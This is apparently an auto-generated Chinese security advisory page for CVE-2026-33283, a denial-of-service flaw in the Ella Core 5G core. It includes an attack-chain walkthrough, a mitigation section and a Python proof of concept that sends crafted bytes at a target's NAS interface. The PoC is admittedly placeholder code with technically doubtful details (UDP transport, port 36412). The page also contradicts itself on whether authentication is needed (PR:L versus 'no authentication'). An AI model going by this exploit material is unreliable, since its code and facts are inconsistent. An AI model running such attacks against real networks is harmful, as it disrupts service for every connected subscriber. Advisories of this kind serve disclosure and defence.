CVE-2026-33283 CVSS 6.5 中危

CVE-2026-33283 Ella Core 拒绝服务漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33283

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ella Core

漏洞概述

Ella Core 是专为私有网络设计的 5G 核心网系统。在 1.6.0 版本之前，该系统在处理缺少请求类型的畸形 UL NAS Transport NAS 消息时存在缺陷。攻击者无需身份验证即可发送精心构造的恶意 NAS 消息，导致核心进程崩溃并引发服务中断。该漏洞直接影响所有已连接的订阅者，造成严重的拒绝服务风险。

技术细节

该漏洞源于 Ella Core 在解析上行链路（UL）NAS 传输消息时的输入验证逻辑不完善。具体而言，当受影响版本的系统接收到一个未包含“Request Type”字段的畸形 UL NAS Transport 消息时，代码逻辑未能正确处理该异常情况，且未检查是否存在 SM Context。这导致底层程序触发运行时 Panic，进而使核心进程崩溃。攻击者无需经过身份认证，即可通过网络向目标设备发送精心构造的恶意 NAS 协议数据包。由于漏洞利用条件简单（攻击复杂度低，无需用户交互），一旦攻击成功，将直接导致 Ella Core 服务终止，造成所有连接的订阅者网络中断。修复版本 1.6.0 引入了额外的守卫机制，在接收无 Request Type 的消息时进行安全检查，从而防止了崩溃的发生。

攻击链分析

STEP 1

侦察

攻击者识别网络中暴露的 Ella Core 5G 核心网实例及其 NAS 接口端口。

STEP 2

构造攻击载荷

攻击者构造一个特殊的 UL NAS Transport 消息，该消息故意缺少 'Request Type' 信息元素。

STEP 3

发送恶意数据包

攻击者通过网络直接向目标 Ella Core 实例发送该畸形 NAS 消息，无需身份验证。

STEP 4

触发拒绝服务

Ella Core 进程在处理该异常消息时触发 Panic 并崩溃，导致所有连接用户失去网络服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-33283
# This script demonstrates sending a malformed NAS message to Ella Core.
# Note: Actual exploitation requires a valid 5G RAN setup or protocol emulator.

import socket

def send_malformed_nas(target_ip, target_port):
    """
    Sends a crafted UL NAS Transport message without Request Type
    to trigger the panic in Ella Core < 1.6.0.
    """
    # Constructing a raw byte buffer representing a malformed NAS PDU.
    # This is a placeholder structure. Real NAS messages contain specific headers.
    # The triggering condition is the absence of the Request Type IE within
    # the UL NAS Transport message payload.
    malformed_payload = b'\x7e\x00\x01\x00' # Example placeholder bytes

    try:
        # Sending via UDP (common for NAS transport over IP)
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(malformed_payload, (target_ip, target_port))
        print(f"[+] Malformed NAS message sent to {target_ip}:{target_port}")
        sock.close()
    except Exception as e:
        print(f"[-] Error sending packet: {e}")

if __name__ == "__main__":
    TARGET_IP = "192.168.1.100" # Replace with actual Ella Core IP
    TARGET_PORT = 36412         # Replace with actual interface port
    send_malformed_nas(TARGET_IP, TARGET_PORT)

影响范围

Ella Core < 1.6.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边缘部署防火墙，仅允许已知的基站（gNodeB）IP 地址连接到 Ella Core。同时，监控核心网进程的运行状态，一旦检测到崩溃尝试自动重启服务以减少业务影响时间。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表